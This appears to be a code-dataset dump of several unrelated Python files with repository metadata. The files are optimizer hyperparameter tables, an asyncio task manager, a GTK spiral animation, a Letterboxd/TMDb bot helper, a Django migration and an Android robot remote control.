"start_temp": ["float", "1", "0.5 ... 1.5"],
}
alpha_d = {
"alpha": ["float", "1", "0.5 ... 2"],
}
gamma_d = {
"gamma": ["float", "2", "0.5 ... 5"],
}
beta_d = {
"beta": ["float", "0.5", "0.25 ... 3"],
}
sigma_d = {
"sigma": ["float", "0.5", "0.25 ... 3"],
}
step_size_d = {
"step_size": ["int", "1", "1 ... 1000"],
}
n_iter_restart_d = {
"n_iter_restart": ["int", "10", "5 ... 20"],
}
iters_p_dim_d = {
"iters_p_dim": ["int", "10", "5 ... 15"],
}
n_positions_d = {
"n_positions": ["int", "4", "2 ... 8"],
}
pattern_size_d = {
"pattern_size": ["float", "0.25", "0.1 ... 0.5"],
}
reduction_d = {
"reduction": ["float", "0.9", "0.75 ... 0.99"],
}
population_parallel_temp_d = {
"population": ["int", "5", "3 ... 15"],
}
n_iter_swap_parallel_temp_d = {
"n_iter_swap": ["int", "10", "5 ... 15"],
}
population_pso_d = {
"population": ["int", "10", "4 ... 15"],
}
inertia_d = {
"inertia": ["float", "0.5", "0.25 ... 0.75"],
}
cognitive_weight_d = {
"cognitive_weight": ["float", "0.5", "0.25 ... 0.75"],
}
social_weight_d = {
"social_weight": ["float", "0.5", "0.25 ... 0.75"],
}
temp_weight_d = {
"temp_weight": ["float", "0.2", "0.05 ... 0.3"],
}
population_evo_strat_d = {
"population": ["int", "10", "4 ... 15"],
}
mutation_rate_d = {
"mutation_rate": ["float", "0.7", "0.1 ... 0.9"],
}
crossover_rate_d = {
"crossover_rate": ["float", "0.3", "0.1 ... 0.9"],
}
gpr_bayes_opt_d = {
"gpr": ["class", "0.3", "-"],
}
xi_bayes_opt_d = {
"xi": ["float", "0.3", "0.1 ... 0.9"],
}
warm_start_smbo_d = {
"warm_start_smbo": ["pandas dataframe", "None", "-"],
}
max_sample_size_d = {
"max_sample_size": ["int", "10000000", "-"],
}
sampling_d = {
"sampling": ["dict", "{'random': 1000000}", "-"],
}
gamma_tpe_d = {
"gamma_tpe": ["float", "0.2", "0.05 ... 0.75"],
}
tree_regressor_d = {
"tree_regressor": [
"string",
"extra_tree",
"extra_tree, random_forest, gradient_boost",
],
}
tree_para_d = {
"tree_para": ["dict", "{'n_estimators': 100}", "-"],
}
xi_forest_opt_d = {
"xi": ["float", "0.03", "0.001 ... 0.1"],
}
| 23.247788 | 78 | 0.50552 | epsilon_d_ = {
"epsilon": ["float", "0.03", "0.01 ... 0.3"],
}
distribution_d_ = {
"distribution": ["string", "normal", "normal, laplace, logistic, gumbel"],
}
n_neighbours_d_ = {
"n_neighbours": ["int", "3", "1 ... 10"],
}
p_accept_d_ = {
"p_accept": ["float", "0.1", "0.01 ... 0.3"],
}
repulsion_factor_d = {
"repulsion_factor": ["float", "5", "2 ... 10"],
}
annealing_rate_d = {
"annealing_rate": ["float", "0.97", "0.9 ... 0.99"],
}
start_temp_d = {
"start_temp": ["float", "1", "0.5 ... 1.5"],
}
alpha_d = {
"alpha": ["float", "1", "0.5 ... 2"],
}
gamma_d = {
"gamma": ["float", "2", "0.5 ... 5"],
}
beta_d = {
"beta": ["float", "0.5", "0.25 ... 3"],
}
sigma_d = {
"sigma": ["float", "0.5", "0.25 ... 3"],
}
step_size_d = {
"step_size": ["int", "1", "1 ... 1000"],
}
n_iter_restart_d = {
"n_iter_restart": ["int", "10", "5 ... 20"],
}
iters_p_dim_d = {
"iters_p_dim": ["int", "10", "5 ... 15"],
}
n_positions_d = {
"n_positions": ["int", "4", "2 ... 8"],
}
pattern_size_d = {
"pattern_size": ["float", "0.25", "0.1 ... 0.5"],
}
reduction_d = {
"reduction": ["float", "0.9", "0.75 ... 0.99"],
}
population_parallel_temp_d = {
"population": ["int", "5", "3 ... 15"],
}
n_iter_swap_parallel_temp_d = {
"n_iter_swap": ["int", "10", "5 ... 15"],
}
population_pso_d = {
"population": ["int", "10", "4 ... 15"],
}
inertia_d = {
"inertia": ["float", "0.5", "0.25 ... 0.75"],
}
cognitive_weight_d = {
"cognitive_weight": ["float", "0.5", "0.25 ... 0.75"],
}
social_weight_d = {
"social_weight": ["float", "0.5", "0.25 ... 0.75"],
}
temp_weight_d = {
"temp_weight": ["float", "0.2", "0.05 ... 0.3"],
}
population_evo_strat_d = {
"population": ["int", "10", "4 ... 15"],
}
mutation_rate_d = {
"mutation_rate": ["float", "0.7", "0.1 ... 0.9"],
}
crossover_rate_d = {
"crossover_rate": ["float", "0.3", "0.1 ... 0.9"],
}
gpr_bayes_opt_d = {
"gpr": ["class", "0.3", "-"],
}
xi_bayes_opt_d = {
"xi": ["float", "0.3", "0.1 ... 0.9"],
}
warm_start_smbo_d = {
"warm_start_smbo": ["pandas dataframe", "None", "-"],
}
max_sample_size_d = {
"max_sample_size": ["int", "10000000", "-"],
}
sampling_d = {
"sampling": ["dict", "{'random': 1000000}", "-"],
}
gamma_tpe_d = {
"gamma_tpe": ["float", "0.2", "0.05 ... 0.75"],
}
tree_regressor_d = {
"tree_regressor": [
"string",
"extra_tree",
"extra_tree, random_forest, gradient_boost",
],
}
tree_para_d = {
"tree_para": ["dict", "{'n_estimators': 100}", "-"],
}
xi_forest_opt_d = {
"xi": ["float", "0.03", "0.001 ... 0.1"],
}
| 0 | 0 | 0 |
34998dafee2d5b0abab5b24a8a1a045fcb034d90 | 3,173 | py | Python | mt/base/aio/procedure.py | inteplus/mtbase | b211f25110f95be8b78be3e44feb1c16789c13b8 | [
"MIT"
] | null | null | null | mt/base/aio/procedure.py | inteplus/mtbase | b211f25110f95be8b78be3e44feb1c16789c13b8 | [
"MIT"
] | null | null | null | mt/base/aio/procedure.py | inteplus/mtbase | b211f25110f95be8b78be3e44feb1c16789c13b8 | [
"MIT"
] | null | null | null | '''Asynchronous procedure.
An asynchronous procedure, a.k.a. an aproc, is a procedure that is asynchronous and has been
wrapped into an :class:`asyncio.Future`. A procedure is a function that returns None.
'''
import asyncio
__all__ = ['AprocManager']
class AprocManager:
'''Manages the completion of aprocs.
With this manager, the user can just send an aproc to it and forget. To ensure all aprocs
are completed, please invoke the cleanup function. Otherwise, some aprocs may never get
awaited when the manager dies.
Parameters
----------
max_concurrency : int
maximum number of concurrent aprocs that can be held pending
handle_exception : {'raise', 'silent', 'warn'}
policy for handling an exception raised by an aproc. If 'raise', re-raise the caught
exception. If 'silent', ignore the exception. If 'warn', use the provided logger to
warn the user.
logger : logging.Logger or equivalent
logger for warning purposes
'''
async def send(self, aproc: asyncio.Future):
'''Sends an aproc to the manager so the user can forget about it.
The function usually returns immediately. However, if the maximum number of concurrent
aprocs has been exceeded. It will await.
Parameters
----------
aproc : asyncio.Future
a future (returned via :func:`asyncio.create_task` or :func:`asyncio.ensure_future`)
that is a procedure
'''
await self._sleep_well()
self.aproc_set.add(aproc)
async def cleanup(self):
'''Awaits until all aprocs are done.'''
await self._sleep_well(1)
| 39.6625 | 109 | 0.6341 | '''Asynchronous procedure.
An asynchronous procedure, a.k.a. an aproc, is a procedure that is asynchronous and has been
wrapped into an :class:`asyncio.Future`. A procedure is a function that returns None.
'''
import asyncio
__all__ = ['AprocManager']
class AprocManager:
    '''Manages the completion of aprocs.

    With this manager, the user can just send an aproc to it and forget. To ensure all aprocs
    are completed, please invoke the cleanup function. Otherwise, some aprocs may never get
    awaited when the manager dies.

    Parameters
    ----------
    max_concurrency : int
        maximum number of concurrent aprocs that can be held pending
    handle_exception : {'raise', 'silent', 'warn'}
        policy for handling an exception raised by an aproc. If 'raise', re-raise the caught
        exception. If 'silent', ignore the exception. If 'warn', use the provided logger to
        warn the user.
    logger : logging.Logger or equivalent
        logger for warning purposes
    '''

    def __init__(self, max_concurrency: int = 1024, handle_exception: str = 'raise', logger=None):
        self.max_concurrency = max_concurrency
        self.aproc_set = set()  # aprocs currently pending completion
        self.handle_exception = handle_exception
        self.logger = logger
        if handle_exception == 'warn' and logger is None:
            raise ValueError("A logger must be provided if keyword 'handle_exception' is set to 'warn'.")

    async def _sleep_well(self, max_concurrency=None):
        '''Awaits until fewer than `max_concurrency` aprocs remain pending.

        BUGFIX: the previous implementation ignored any caller-supplied value
        and always used 1 (`... if max_concurrency is None else 1`); it now
        honours the argument. `cleanup()` passes 1 so its behaviour is
        unchanged.
        '''
        if max_concurrency is None:
            max_concurrency = self.max_concurrency
        while len(self.aproc_set) >= max_concurrency:
            # asyncio.wait returns (done, pending); keep only the pending ones.
            done_set, pending_set = await asyncio.wait(self.aproc_set, return_when=asyncio.FIRST_COMPLETED)
            for task in done_set:
                if task.cancelled():
                    if self.handle_exception == 'raise':
                        raise asyncio.CancelledError("An aproc has been cancelled.")
                    if self.handle_exception == 'warn':
                        self.logger.warn("An aproc has been cancelled: {}.".format(task))
                elif task.exception() is not None:
                    if self.handle_exception == 'raise':
                        raise task.exception()
                    if self.handle_exception == 'warn':
                        self.logger.warn("An exception has been caught (and ignored) in an aproc.")
                        self.logger.warn(str(task.exception()))
            self.aproc_set = pending_set

    async def send(self, aproc: asyncio.Future):
        '''Sends an aproc to the manager so the user can forget about it.

        The function usually returns immediately. However, if the maximum number of concurrent
        aprocs has been exceeded. It will await.

        Parameters
        ----------
        aproc : asyncio.Future
            a future (returned via :func:`asyncio.create_task` or :func:`asyncio.ensure_future`)
            that is a procedure
        '''
        await self._sleep_well()
        self.aproc_set.add(aproc)

    async def cleanup(self):
        '''Awaits until all aprocs are done.'''
        await self._sleep_well(1)
8274136679ce63a74786a5d2b3687fe982c83c08 | 2,005 | py | Python | hypno.py | Leonidas-from-XIV/sandbox | ca1f53d4ba1c27be4397c18bf3d5a2ccf9db6a50 | [
"WTFPL"
] | null | null | null | hypno.py | Leonidas-from-XIV/sandbox | ca1f53d4ba1c27be4397c18bf3d5a2ccf9db6a50 | [
"WTFPL"
] | null | null | null | hypno.py | Leonidas-from-XIV/sandbox | ca1f53d4ba1c27be4397c18bf3d5a2ccf9db6a50 | [
"WTFPL"
] | null | null | null | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
import math
import gtk, gobject
import gnomecanvas
if __name__ == '__main__':
main()
| 29.925373 | 70 | 0.573566 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
import math
import gtk, gobject
import gnomecanvas
class HypnoticWindow(object):
    """GTK window that draws a rotating spiral on a GnomeCanvas."""
    def __init__(self, width, height):
        """Build the window with a white canvas and an (initially empty) path."""
        self.window = gtk.Window()
        self.window.set_title('Spiral')
        self.window.connect('delete_event', gtk.main_quit)
        self.width, self.height = width, height
        # Current rotation of the spiral, in radians.
        self.orientation = 0
        self.canvas = gnomecanvas.Canvas()
        self.canvas.set_size_request(width, height)
        self.canvas.set_scroll_region(0, 0, width, height)
        self.window.add(self.canvas)
        # White background rectangle covering the whole canvas.
        back = self.canvas.root().add(gnomecanvas.CanvasRect,
            fill_color='white', x1=0, y1=0, x2=width, y2=height)
        # The spiral is drawn as a bezier path, rebuilt on every rotation.
        self.bpath = self.canvas.root().add(gnomecanvas.CanvasBpath,
            outline_color='black', width_pixels=3)
        self.window.show_all()
    def create_spiral(self):
        """Recompute the spiral points for the current orientation and draw them.

        Builds an Archimedean spiral (r = a*t) around the canvas center,
        stopping once the curve leaves the visible area.
        """
        self.path = [
            (self.width / 2, self.height / 2)
        ]
        a = 0.03
        t = 0.0
        while True:
            r = a * t
            angle = t + self.orientation
            x = r * math.cos(angle) * 200
            y = r * math.sin(angle) * 200
            # are we still inside the canvas size?
            if x > self.width / 2 and y > self.height / 2:
                break
            self.path.append((x + 200, y + 200))
            t += 0.1
        self.render_path(self.path)
    def render_path(self, path):
        """Convert *path* (list of (x, y)) into a bezier path and display it."""
        commands = [(gnomecanvas.MOVETO_OPEN, path[0][0], path[0][1])]
        commands += [(gnomecanvas.LINETO, x, y) for x, y in path[1:]]
        path_def = gnomecanvas.path_def_new(commands)
        self.bpath.set_bpath(path_def)
    def rotate(self, angle):
        """Advance the spiral by *angle* radians and redraw.

        Returns True so a gobject timeout keeps firing.
        """
        self.orientation += angle
        self.create_spiral()
        return True
def main():
    """Create the spiral window and run the GTK main loop."""
    window = HypnoticWindow(400, 400)
    window.create_spiral()
    # Rotate the spiral by 0.1 rad every 10 ms until the window is closed.
    gobject.timeout_add(10, window.rotate, 0.1)
    gtk.main()
if __name__ == '__main__':
main()
| 1,140 | 683 | 46 |
0c3a35ed3caed81730d5c1e91525115e25c0ced4 | 2,954 | py | Python | crew.py | koenhagen/lb-bot | 8433a401fe1d2d3237f8a8a028bb5ed4298e280d | [
"MIT"
] | 10 | 2021-01-27T01:55:38.000Z | 2022-02-04T06:09:31.000Z | crew.py | koenhagen/lb-bot | 8433a401fe1d2d3237f8a8a028bb5ed4298e280d | [
"MIT"
] | null | null | null | crew.py | koenhagen/lb-bot | 8433a401fe1d2d3237f8a8a028bb5ed4298e280d | [
"MIT"
] | 5 | 2021-01-17T21:33:34.000Z | 2022-02-13T19:58:45.000Z | from api import api_call
from config import SETTINGS
from helpers import create_embed, LetterboxdError
| 37.392405 | 78 | 0.63981 | from api import api_call
from config import SETTINGS
from helpers import create_embed, LetterboxdError
async def crew_embed(input_name, cmd_alias):
    """Build a rich embed describing a film contributor (director/actor/...).

    Looks the person up on Letterboxd (honouring pinned searches), augments
    the description with TMDb birth/death data and a profile picture, and
    returns the embed created by helpers.create_embed.

    Raises LetterboxdError (via __search_letterboxd) when nothing is found.
    """
    lbxd_id = __check_if_fixed_search(input_name)
    person_json = await __search_letterboxd(input_name, cmd_alias, lbxd_id)
    description, name, url, tmdb_id = __get_details(person_json)
    api_url = 'https://api.themoviedb.org/3/person/{}'.format(tmdb_id)
    description += await __get_dates(api_url)
    picture = await __get_picture(api_url)
    return create_embed(name, url, description, picture)
def __check_if_fixed_search(keywords):
    """Return the pinned Letterboxd id for *keywords*, or '' when not pinned."""
    wanted = keywords.lower()
    for fixed_name, fixed_id in SETTINGS['fixed_crew_search'].items():
        if fixed_name.lower() == wanted:
            return fixed_id
    return ''
async def __search_letterboxd(item, cmd_alias, lbxd_id):
    """Fetch a contributor JSON from the Letterboxd API.

    When *lbxd_id* is non-empty the contributor is fetched directly;
    otherwise a search is issued, narrowed to actors or directors depending
    on the invoking command alias. Returns the first matching contributor.

    Raises LetterboxdError when the search yields no items.
    """
    if lbxd_id:
        person_json = await api_call('contributor/' + lbxd_id)
    else:
        params = {'input': item, 'include': 'ContributorSearchItem'}
        if cmd_alias in ['actress', 'actor']:
            params['contributionType'] = 'Actor'
        elif cmd_alias == 'director':
            params['contributionType'] = 'Director'
        response = await api_call('search', params)
        if not response['items']:
            raise LetterboxdError('No person was found with this search.')
        person_json = response['items'][0]['contributor']
    return person_json
def __get_details(person_json):
    """Extract (description, name, letterboxd url, tmdb id) from contributor JSON.

    The description is one markdown line per contribution type, e.g.
    '**Director:** 3'. Assumes the JSON carries both a 'tmdb' and a
    'letterboxd' link (as returned by the Letterboxd API).
    """
    for link in person_json['links']:
        link_type = link['type']
        if link_type == 'tmdb':
            tmdb_id = link['id']
        elif link_type == 'letterboxd':
            url = link['url']
    description = ''.join(
        '**{}:** {}\n'.format(stats['type'], stats['filmCount'])
        for stats in person_json['statistics']['contributions']
    )
    return description, person_json['name'], url, tmdb_id
async def __get_dates(api_url):
    """Return markdown lines for birthday / day of death / place of birth.

    Queries TMDb at *api_url* and skips fields that are missing or empty;
    returns '' when none of the three fields are present.
    """
    details_text = ''
    url = api_url + '?api_key={}'.format(SETTINGS['tmdb'])
    person_tmdb = await api_call(url, None, False)
    for element in person_tmdb:
        # Skip null/empty values so we never render an empty field.
        if not person_tmdb[element]:
            continue
        if element == 'birthday':
            details_text += '**Birthday:** ' + person_tmdb[element] + '\n'
        elif element == 'deathday':
            details_text += '**Day of Death:** ' + person_tmdb[element] + '\n'
        elif element == 'place_of_birth':
            details_text += '**Place of Birth:** ' + person_tmdb[element]
    return details_text
async def __get_picture(api_url):
    """Return the URL of the highest-voted TMDb profile image, or '' if none."""
    api_url += '/images?api_key=' + SETTINGS['tmdb']
    images_json = await api_call(api_url, None, False)
    if not images_json or not images_json['profiles']:
        return ''
    top_vote = 0
    # Later profiles win ties, matching TMDb's ordering.
    for profile in images_json['profiles']:
        if profile['vote_average'] >= top_vote:
            top_vote = profile['vote_average']
            chosen_path = profile['file_path']
    return 'https://image.tmdb.org/t/p/w200' + chosen_path
| 2,707 | 0 | 138 |
46d4cfc2a4ae2b3653dbb6e24c91be1e5c58e672 | 1,725 | py | Python | systori/apps/company/migrations/0002_auto_20190730_2210.py | systori/systori | e309c63e735079ff6032fdaf1db354ec872b28b1 | [
"BSD-3-Clause"
] | 12 | 2018-01-30T00:44:06.000Z | 2020-07-13T05:20:48.000Z | systori/apps/company/migrations/0002_auto_20190730_2210.py | systori/systori | e309c63e735079ff6032fdaf1db354ec872b28b1 | [
"BSD-3-Clause"
] | 36 | 2018-03-06T17:49:50.000Z | 2020-06-23T19:26:00.000Z | systori/apps/company/migrations/0002_auto_20190730_2210.py | systori/systori | e309c63e735079ff6032fdaf1db354ec872b28b1 | [
"BSD-3-Clause"
] | 3 | 2018-08-03T07:03:09.000Z | 2020-07-09T20:21:10.000Z | # Generated by Django 2.0.13 on 2019-07-30 20:10
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
from postgres_schema.operations import RunInPublic
| 28.75 | 68 | 0.496232 | # Generated by Django 2.0.13 on 2019-07-30 20:10
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
from postgres_schema.operations import RunInPublic
class Migration(migrations.Migration):
    """Auto-generated Django migration: wire Worker/Contract/Company to the
    user model. All operations run in the public schema (RunInPublic wrapper
    from postgres_schema) — presumably because these are shared, not
    per-tenant, tables; confirm against the project's schema setup."""

    initial = True

    dependencies = [
        ("company", "0001_initial"),
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        # Worker.user: each worker row belongs to exactly one auth user.
        RunInPublic(
            migrations.AddField(
                model_name="worker",
                name="user",
                field=models.ForeignKey(
                    on_delete=django.db.models.deletion.CASCADE,
                    related_name="access",
                    to=settings.AUTH_USER_MODEL,
                ),
            )
        ),
        # Contract.worker: nullable link from a contract to its worker.
        RunInPublic(
            migrations.AddField(
                model_name="contract",
                name="worker",
                field=models.ForeignKey(
                    null=True,
                    on_delete=django.db.models.deletion.CASCADE,
                    related_name="contracts",
                    to="company.Worker",
                ),
            )
        ),
        # Company.users: many-to-many via the Worker through-model.
        RunInPublic(
            migrations.AddField(
                model_name="company",
                name="users",
                field=models.ManyToManyField(
                    blank=True,
                    related_name="companies",
                    through="company.Worker",
                    to=settings.AUTH_USER_MODEL,
                ),
            )
        ),
        # A user may appear at most once per company.
        RunInPublic(
            migrations.AlterUniqueTogether(
                name="worker", unique_together={("company", "user")}
            )
        ),
    ]
| 0 | 1,493 | 23 |
652e1af2d76fc8f234b10e9c9f6b44f047c6d6ce | 10,843 | py | Python | android/python/cellbotRemote.py | jlivingstonsg/Cellbots-2019 | 2e4635beab0cabef7a75e9d863d588b51db0e74d | [
"Apache-2.0"
] | 2 | 2018-10-11T16:11:11.000Z | 2018-10-11T16:15:53.000Z | android/python/cellbotRemote.py | jlivingstonsg/Cellbots-2019 | 2e4635beab0cabef7a75e9d863d588b51db0e74d | [
"Apache-2.0"
] | 38 | 2015-03-03T22:32:20.000Z | 2015-03-03T22:32:47.000Z | android/python/cellbotRemote.py | jlivingstonsg/Cellbots-2019 | 2e4635beab0cabef7a75e9d863d588b51db0e74d | [
"Apache-2.0"
] | null | null | null | # Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
#
# See http://www.cellbots.com for more information
__license__ = 'Apache License, Version 2.0'
import ConfigParser
import os
import sys
import time
from threading import Thread
import android
import math
from threadedAndroid import droid
import utils
import xmpp
# Send command out of uplink
# Send command out of the device over BlueTooth or XMPP
class CellbotRemote(Thread):
"""Cellbot remote control"""
# Give the user an option to try other actions while still using the remote as
# an accelerometer
| 37.649306 | 80 | 0.636909 | # Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
#
# See http://www.cellbots.com for more information
__license__ = 'Apache License, Version 2.0'
import ConfigParser
import os
import sys
import time
from threading import Thread
import android
import math
from threadedAndroid import droid
import utils
import xmpp
class RemoteState(object):
  """Mutable flags shared between the accelerometer loop and the menu thread."""
  def __init__(self):
    # Cleared by the options menu to stop the remote-control main loop.
    self.running = True
    # While True the accelerometer loop withholds drive commands.
    self.pauseSending = False
class RemoteUplink(object):
  """Wraps the raw uplink, throttling duplicate commands and toasts.

  BUGFIX: the throttle windows previously added 1000 and 5000 to
  time.time(), which returns *seconds* — so identical commands were
  suppressed for ~17 minutes and toasts for ~83 minutes, despite the
  comments promising 1 s and 5 s. The offsets are now 1 and 5 seconds.
  """
  def __init__(self, remoteUplink, state):
    """Args:
      remoteUplink: object with a sendCmd(msg) method (BlueTooth or XMPP).
      state: RemoteState shared with the accelerometer loop.
    """
    self.remoteUplink = remoteUplink
    self.state = state
    self.previousMsg = ""
    self.lastMsgTime = time.time()
    self.previousToastMsg = ''
    self.lastToastMsgTime = 0

  # Send command out of the device over BlueTooth or XMPP
  def sendCmd(self, droid, msg, override=False):
    """Forward msg over the uplink unless sending is paused (or override)."""
    if not self.state.pauseSending or override:
      try:
        # Don't send the same message repeatedly unless 1 second has passed
        if msg != self.previousMsg or (time.time() > self.lastMsgTime + 1):
          self.remoteUplink.sendCmd(msg)
      except IOError:
        self.specialToast(droid, "Failed to send command to robot")
      self.previousMsg=msg
      self.lastMsgTime = time.time()

  # Show a toast on the device, best-effort
  def specialToast(self, droid, msg):
    """Pop up msg on the phone; failures are deliberately ignored."""
    try:
      # Don't toast the same message repeatedly unless 5 seconds have passed
      if msg != self.previousToastMsg or \
          (time.time() > self.lastToastMsgTime + 5):
        droid.makeToast(msg)
    except Exception:
      # Best-effort UI feedback only; never let a toast failure propagate.
      pass
    self.previousToastMsg=msg
    self.lastToastMsgTime = time.time()
class CellbotRemote(Thread):
  """Cellbot remote control.

  Background thread that polls the phone's accelerometer and translates
  pitch/roll into differential-drive wheel-speed commands ("ws L R"),
  sent through the RemoteUplink.
  """
  def __init__(self, config, uplink, sendQuit=False):
    """Args:
      config: settings object; speedScaleFactor / directionScaleFactor used.
      uplink: uplink object with a sendCmd(msg) method (BlueTooth or XMPP).
      sendQuit: if True, the options menu sends a quit command on exit.
    """
    Thread.__init__(self)
    self.config = config
    self.state = RemoteState()
    self.remoteUplink = RemoteUplink(uplink, self.state)
    self.droid = droid
    self.optionsThread = RemoteCommandOptions(self.remoteUplink, self.state,
                                              sendQuit)
    self.optionsThread.daemon = True
  def startOptions(self):
    """Start the pop-up options-menu thread."""
    self.optionsThread.start()
  def run(self):
    """Poll sensors and stream wheel-speed commands until state.running clears."""
    self.droid.startSensing()
    time.sleep(1.0) # give the sensors a chance to start up
    while self.state.running:
      try:
        sensor_result = self.droid.readSensors()
        pitch=float(sensor_result.result['pitch'])
        roll=float(sensor_result.result['roll'])
      except TypeError:
        pitch = 0
        roll = 0
        self.remoteUplink.specialToast(self.droid, "Failed to read sensors")
      # Convert the radians returned into degrees
      pitch = pitch * 57.2957795
      roll = roll * 57.2957795
      # Assumes the phone is flat on table for no speed and no turning
      # Translate the pitch into a speed ranging from -100 (full backward) to
      # 100 (full forward).
      # Also support a gutter (dead spot) in the middle and buzz the phone when
      # user is out of range.
      if pitch > 50:
        speed = 100
        self.droid.vibrate((pitch -50) * 10)
        self.remoteUplink.specialToast(self.droid, "Too far forward")
      elif pitch < -50:
        speed = -100
        self.droid.vibrate(((pitch *-1) -50) * 10)
        self.remoteUplink.specialToast(self.droid, "Too far backward")
      elif pitch in range(-5,5):
        speed = 0
      else:
        # Take the pitch that range from 50 to -50 and multiply it by two and
        # reverse the sign
        speed = pitch * 2
      # Translate the roll into a direction ranging from -100 (full left) to 100
      # (full right).
      # Also support a gutter (dead spot) in the middle and buzz the phone when
      # user is out of range.
      if roll > 50:
        direction = 100
        self.droid.vibrate((roll -50) * 10)
        self.remoteUplink.specialToast(self.droid, "Too far left")
      elif roll < -50:
        direction = -100
        self.droid.vibrate(((roll *-1) -50) * 10)
        self.remoteUplink.specialToast(self.droid, "Too far right")
      elif roll in range(-5,5):
        direction = 0
      else:
        # Take the roll that range from 50 to -50 and multiply it by two and
        # reverse the sign
        direction = roll * 2
      # Reverse turning when going backwards to mimic what happens when steering
      # a non-differential drive system
      # where direction is really a "bias" and not a true turning angle.
      if speed < 0:
        direction = direction * -1
      # Clamp speed and direction between -100 and 100 just in case the above
      # lets something slip
      speed = max(min(speed, 100), -100)
      direction = max(min(direction, 100), -100)
      # Apply acceleration scaling factor since linear use of the accelerometer
      # goes too fast with minor tilts
      scaledSpeed = math.pow(abs(speed) / 100.00, self.config.speedScaleFactor)
      speed = math.copysign(scaledSpeed, speed) * 100.00
      scaledDirection = math.pow(abs(direction) / 100.00,
                                 self.config.directionScaleFactor)
      direction = math.copysign(scaledDirection, direction) * 100.00
      # Okay, speed and direction are now both in the range of -100:100.
      # Speed=100 means to move forward at full speed. direction=100 means
      # to turn right as much as possible.
      # Treat direction as the X axis, and speed as the Y axis.
      # If we're driving a differential-drive robot (each wheel moving forward
      # or back), then consider the left wheel as the X axis and the right
      # wheel as Y.
      # If we do that, then we can translate [speed,direction] into [left,right]
      # by rotating by -45 degrees.
      # See the writeup at
      # http://code.google.com/p/cellbots/wiki/TranslatingUserControls
      # This actually rotates by 45 degrees and scales by 1.414, so that full
      # forward = [100,100]
      right = speed - direction
      left = speed + direction
      # But now that we've scaled, asking for full forward + full right turn
      # means the motors need to go to 141. If we're asking for > 100, scale
      # back without changing the proportion of forward/turning
      if abs(left) > 100 or abs(right) > 100:
        scale = 1.0
        # if left is bigger, use it to get the scaling amount
        if abs(left) > abs(right):
          scale = 100.0 / abs(left)
        else:
          scale = 100.0 / abs(right)
        left = int(scale * left)
        right = int(scale * right)
      command = "ws %d %d" % (left, right)
      self.remoteUplink.sendCmd(self.droid, command)
      time.sleep(0.25)
    sys.exit()
# Give the user an option to try other actions while still using the remote as
# an accelerometer
class RemoteCommandOptions(Thread):
  """Pop-up menu thread offering one-shot robot actions while driving.

  While an action runs, the accelerometer stream is paused through the
  shared RemoteState so the robot only executes the selected action.
  """
  # Compass headings, in degrees, for the (currently disabled) pointing action.
  kCardinals = {
      'North': '0', 'East': '90', 'West': '270', 'South': '180'
  }
  def __init__ (self, remoteUplink, remoteState, sendQuit=False):
    """ Initialize remote command options thread.
    This handles the remote control menu, displays menu, get user input, send
    commands.
    Args:
      remoteUplink: RemoteUplink object.
      remoteState: RemoteState object, shared with CellbotRemote object.
      sendQuit: If true, send quit command on exit.
    """
    Thread.__init__(self)
    self.remoteUplink = remoteUplink
    self.state = remoteState
    self.droid = droid
    self.unlocked_droid = android.Android()
    self.sendQuit = sendQuit
  def run(self):
    """Display the action menu in a loop until the user picks Exit."""
    command = ''
    msg = ''
    while command != "Exit":
      try:
        command = utils.pickFromList(self.unlocked_droid,
            "Pick an action (set down phone to pause)",
            ['Say Hello', 'Point Using Compass', 'Take Picture',
             'Speak Location', 'Voice Command','Exit'])
      except KeyError as e:
        msg = "Sorry, please try that again. %s" % str(e)
        self.droid.makeToast(msg)
      else:
        # Pause sending commands so that robot only does what user selected here
        self.state.pauseSending = True
        if command == "Take Picture":
          self.remoteUplink.sendCmd(self.droid, "picture", True)
          self.droid.ttsSpeak("Asking robot to take a picture")
          self.droid.makeToast("Please wait, this may take a few seconds")
          time.sleep(5)
          msg = "Picture should be taken by now"
        elif command == "Speak Location":
          msg = "Speaking location"
          self.remoteUplink.sendCmd(self.droid, "x", True)
        elif command == "Voice Command":
          try:
            voiceCommand = droid.recognizeSpeech().result
            self.remoteUplink.sendCmd(self.droid, voiceCommand, True)
            msg = "Told the robot to " + voiceCommand
            self.droid.makeToast(msg)
            time.sleep(2)
          except:
            msg = "Could not understand"
        elif command == "Point Using Compass":
          msg = "This feature is currently not available on the robot."
          self.droid.makeToast(msg)
          # try:
          #   direction = utils.pickFromList(self.unlocked_droid,
          #       "Pick a direction", sorted([c for c in self.kCardinals]))
          # except KeyError as e:
          #   msg = "Sorry, please try that again. %s" % str(e)
          #   self.droid.makeToast(msg)
          # else:
          #   self.droid.ttsSpeak("Selected direction %s." % direction)
          #   cmd = "p " + self.kCardinals[direction]
          #   self.remoteUplink.sendCmd(self.droid, cmd, True)
          #   msg = "Asking robot to point " + direction
          #   self.droid.ttsSpeak(msg)
          #   time.sleep(2)
          #   msg = "Robot should be facing " + direction
        elif command == "Say Hello":
          msg = "Asking robot to say hello"
          self.remoteUplink.sendCmd(self.droid, "hi", True)
        elif command == "Exit":
          msg = "Bye bye. Come again."
          if self.sendQuit:
            self.remoteUplink.sendCmd(self.droid, "q", True)
        self.droid.ttsSpeak(msg)
        time.sleep(1)
        # This resumes sending of normal accelerometer stream of commands
        self.state.pauseSending = False
        self.remoteUplink.sendCmd(self.droid, "ws 0 0", True)
    # This will exit the main loop as well. Remove this if you only want to exit
    # the pop-up menu.
    self.state.running = False
| 8,826 | 719 | 239 |
